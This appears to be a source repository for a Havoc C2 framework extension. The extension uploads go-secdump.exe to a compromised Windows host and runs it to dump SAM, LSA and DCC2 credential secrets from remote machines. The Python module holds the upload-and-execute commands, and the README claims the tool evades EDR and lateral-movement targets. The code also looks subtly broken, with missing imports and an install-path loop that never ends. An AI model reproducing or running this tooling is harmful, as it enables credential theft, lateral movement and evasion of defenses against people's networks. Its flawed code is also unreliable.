├── README.md
├── go-secdump.exe
├── gosecdump.py
└── img
    ├── dcc2.png
    ├── lsa.png
    └── poc.png


/README.md:
--------------------------------------------------------------------------------
 1 | # havoc-gosecdump
 2 | 
 3 | >This module will upload the gosecdump binary to a temporary folder under windows  (it's better to use AppData or ProgramData)
 4 | 
 5 | # Usage
 6 | 
 7 | Go to `Attack > Extensions ` and select havoc-gosecdump + install
 8 | 
 9 | you now have a new gosecdump command available
10 | 
11 | 
12 | to use it, here are the parameters to pass: `gosecdump <target_ip> <user> <password> <sam/lsa/dcc2>`
13 | 
14 | 
15 | ![demo nt](img/poc.png)
16 | 
17 | 
18 | ![demo lsa](img/lsa.png)
19 | 
20 | ![demo dcc2](img/poc.png)
21 | 
22 | 
23 | It can be used in 127.0.0.1 but it is more intended to dumper the SAM/LSA/DCC2 on a remote machine that our compromised machine can reach.
24 | 
25 | This binary bypasses EDR-type solutions
26 | 
27 | 
28 | ### Other options : 
29 | 
30 | you can upload the binary yourself and run it with the `shell` command, but this will create a new process.
31 | 
32 | the other option is to use the “noconsolation” mode - don't drop the binary on the target 
33 | 


--------------------------------------------------------------------------------
/go-secdump.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/matro7sh/havoc-gosecdump/dc7c6367af270ae15b7b58aaa78062ffaebba92b/go-secdump.exe


--------------------------------------------------------------------------------
/gosecdump.py:
--------------------------------------------------------------------------------
 1 | from havoc import Demon, RegisterCommand
 2 | from os import path
 3 | 
 4 | gosecdump_current_dir = os.getcwd()
 5 | gosecdump_install_path = "/data/extensions/havoc-gosecdump/"
 6 | while not os.path.exists(gosecdump_current_dir + gosecdump_install_path):
 7 |     # not installed through havoc-store so prompt for the path
 8 |     gosecdump_install_path = ""
 9 |     havocui.inputdialog("Install path", "Please enter your install path here for the module to work correctly:")
10 | AGENT_BIN = gosecdump_current_dir + gosecdump_install_path + "go-secdump.exe"
11 | 
12 | def gosecdump(demonID, *param):
13 |     TaskID : str    = None
14 |     demon  : Demon  = None
15 |     packer = Packer()
16 | 
17 |     demon  = Demon(demonID)
18 | 
19 |     if len(param) < 4:
20 |         demon.ConsoleWrite(
21 |             demon.CONSOLE_ERROR,
22 |             "Not enough arguments please set host, username, password and --lsa/--sam/--dcc2",
23 |         )
24 |         return False
25 | 
26 |     host        = param[0]
27 |     username    = param[1]
28 |     password    = param[2]
29 |     to_dump     = param[3]
30 | 
31 |     if demon.ProcessArch == "x86":
32 |         demon.ConsoleWrite(demon.CONSOLE_ERROR, "x86 is not supported")
33 |         return False
34 | 
35 |     if not path.isfile(AGENT_BIN):
36 |         demon.ConsoleWrite(demon.CONSOLE_ERROR, f"Could not find go-secdump binary. Please install it here or update the script: {AGENT_BIN}")
37 |         return False
38 | 
39 | 
40 |     TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Uploading and running go-secdump.exe")
41 |     demon.Command(TaskID, "cd c:\\windows\\Temp")
42 |     demon.Command(TaskID, f"upload {AGENT_BIN}")
43 |     demon.Command(TaskID, f"shell c:\\windows\\Temp\\go-secdump.exe --host {host} --user {username} --pass {password} {to_dump}")
44 | 
45 |     return TaskID
46 | 
47 | RegisterCommand(gosecdump, "", "gosecdump", "Tool to remotely dump secrets from the Windows registry (SAM,LSA, DCC2)", 4, "Target Admin-user Admin-password --sam/--lsa/--dcc2 (args)", "")


--------------------------------------------------------------------------------
/img/dcc2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/matro7sh/havoc-gosecdump/dc7c6367af270ae15b7b58aaa78062ffaebba92b/img/dcc2.png


--------------------------------------------------------------------------------
/img/lsa.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/matro7sh/havoc-gosecdump/dc7c6367af270ae15b7b58aaa78062ffaebba92b/img/lsa.png


--------------------------------------------------------------------------------
/img/poc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/matro7sh/havoc-gosecdump/dc7c6367af270ae15b7b58aaa78062ffaebba92b/img/poc.png


--------------------------------------------------------------------------------